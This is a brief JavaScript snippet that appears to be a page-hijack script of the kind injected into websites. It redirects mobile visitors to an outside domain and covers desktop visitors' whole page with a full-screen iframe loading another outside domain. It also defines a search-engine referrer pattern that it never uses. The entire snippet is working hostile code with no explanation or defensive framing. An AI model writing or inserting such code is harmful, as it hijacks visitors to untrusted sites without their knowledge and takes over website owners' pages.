﻿if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)))  {
var regexp = /\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|sm|qq|so|sooule|niuhu|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;

    window.location.href = "https://xc9.pm";
}

else{
    
document.write("<style>\r\nhtml,body{width:100%;height:100%;overflow:hidden;margin:0;padding:0;}\r\n.center{height:100%;}\r\n</style>\r\n<iframe src=\"https://xc9.cm\" width=\"100%\" height=\"100%\" frameborder=\"no\" border=\"0\" marginwidth=\"0\" marginheight=\"0\"  scrolling=\"yes\" style=\"position: absolute;z-index:9999;left:0;top: 0px;background:#FFF;\"></iframe>");

}